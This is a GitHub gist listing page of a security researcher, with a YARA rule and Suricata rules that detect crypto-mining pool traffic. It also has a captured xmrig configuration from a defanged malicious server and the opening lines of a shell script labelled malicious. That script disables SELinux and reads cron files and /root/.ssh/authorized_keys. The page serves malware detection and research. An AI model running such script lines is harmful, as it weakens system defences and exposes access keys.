Skip to content

Instantly share code, notes, and snippets.

💭
Researching

GelosSnake GelosSnake

💭
Researching
Block or report user

Report or block GelosSnake

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@GelosSnake
GelosSnake / xmrig.yar
Last active Oct 16, 2018
very simple yara to find xmrig Crypto-Miners
View xmrig.yar
rule MinerGate
{
strings:
$a1 = "minergate.com"
condition:
$a1
}
rule MoneroOrg
{
@GelosSnake
GelosSnake / crypto-Miners_public_pools_sig.txt
Last active Jul 31, 2019
suricata crypto-miner pool rules
View crypto-Miners_public_pools_sig.txt
#Suricata 3.2+
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; dns_query; content:"pool.minergate.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000000; rev:1;)
#Suricata 1.3+
alert udp $HOME_NET any -> any 53 (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; content:"|01|"; offset:2; depth:1; content:"|00 01 00 00 00 00 00|"; distance:1; within:7; content:"|04|pool|09|minergate|03|com|00|"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:20000000; rev:1;)
#Suricata 3.2+
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minexmr.com)"; dns_query; content:"pool.minexmr.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000001; rev:1;)
@GelosSnake
GelosSnake / gist:88694aef6c2819f1f11a42b73d09e421
Created Dec 24, 2018
configuration used by sh miner killer taken from - 45[.]76[.]122[.]92
View gist:88694aef6c2819f1f11a42b73d09e421
related hash: 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
source: hxxp://45[.]76.122.92:8506/IOFoqIgyC0zmf2UR/config.json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
@GelosSnake
GelosSnake / sh
Last active Mar 20, 2019
miner killer sh (malicious) - 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
View sh
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/devtools
rtdir="/etc/devtools"
bbdir="/usr/bin/curl"
@GelosSnake
GelosSnake / keybase.md
Created May 31, 2019
GelosSnake keybase
View keybase.md

Keybase proof

I hereby claim:

  • I am gelossnake on github.
  • I am gelossnake (https://keybase.io/gelossnake) on keybase.
  • I have a public key ASAwA_u6Qo3Rss8MsguyHw0fr0ouch111TV1zcmoTwOk0wo

To claim this, I am signing this object:

You can’t perform that action at this time.